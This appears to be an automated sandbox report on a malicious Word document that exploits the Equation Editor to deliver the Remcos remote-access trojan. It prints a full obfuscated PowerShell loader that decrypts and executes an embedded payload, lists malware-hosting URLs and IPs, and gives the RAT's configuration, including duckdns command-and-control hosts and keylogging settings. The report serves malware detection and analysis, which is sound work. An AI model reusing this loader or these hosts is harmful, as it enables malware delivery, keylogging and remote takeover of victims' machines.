            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 428, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 976, ProcessName: wscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3220, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 3460, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 428, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 976, ProcessName: wscript.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3220, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi", ProcessId: 3512, ProcessName: RegAsm.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 428, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 976, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 428, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3076, TargetFilename: C:\Users\user\AppData\Local\Temp\z04lqfvx.aks.ps1
            No Snort rule has matched
            Timestamp:2024-07-26T15:11:22.810476+0200
            SID:2012510
            Source Port:443
            Destination Port:49172
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-26T15:11:16.475601+0200
            SID:2012510
            Source Port:443
            Destination Port:49171
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-26T15:10:54.085958+0200
            SID:2020424
            Source Port:80
            Destination Port:49165
            Protocol:TCP
            Classtype:Exploit Kit Activity Detected
            Timestamp:2024-07-26T15:11:05.730752+0200
            SID:2803304
            Source Port:49169
            Destination Port:80
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T15:10:51.938874+0200
            SID:2047750
            Source Port:80
            Destination Port:49164
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T15:11:07.096479+0200
            SID:2036594
            Source Port:49167
            Destination Port:57483
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-26T15:11:22.691893+0200
            SID:2803305
            Source Port:49172
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T15:11:07.095485+0200
            SID:2036594
            Source Port:49168
            Destination Port:57483
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-26T15:11:02.622232+0200
            SID:2036594
            Source Port:49166
            Destination Port:57483
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-26T15:10:53.051850+0200
            SID:2049038
            Source Port:80
            Destination Port:49164
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T15:11:55.226848+0200
            SID:2036594
            Source Port:49174
            Destination Port:57483
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: girlfrnd.docAvira: detected
            Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmAvira URL Cloud: Label: phishing
            Source: https://asociatiatraditiimaria.ro/os/transportment.pfmAvira URL Cloud: Label: malware
            Source: http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFAvira URL Cloud: Label: malware
            Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm$Avira URL Cloud: Label: phishing
            Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
            Source: http://new.quranushaiqer.org.saAvira URL Cloud: Label: malware
            Source: https://new.quranushaiqer.org.saAvira URL Cloud: Label: malware
            Source: 00000008.00000002.881967871.00000000005B1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_00433837
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404423 FreeLibrary,CryptUnprotectData,12_2_00404423
            Source: powershell.exe, 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7d7f9f3a-6

            Exploits

            barindex
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.powershell.exe.446d080.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3220, type: MEMORYSTR
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.168.45.34 Port: 80Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

            Privilege Escalation

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004074FD _wcslen,CoGetObject,8_2_004074FD
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.22:49171 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.22:49173 version: TLS 1.2
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.378147643.0000000006230000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.375856894.0000000003679000.00000004.00000800.00020000.00000000.sdmp
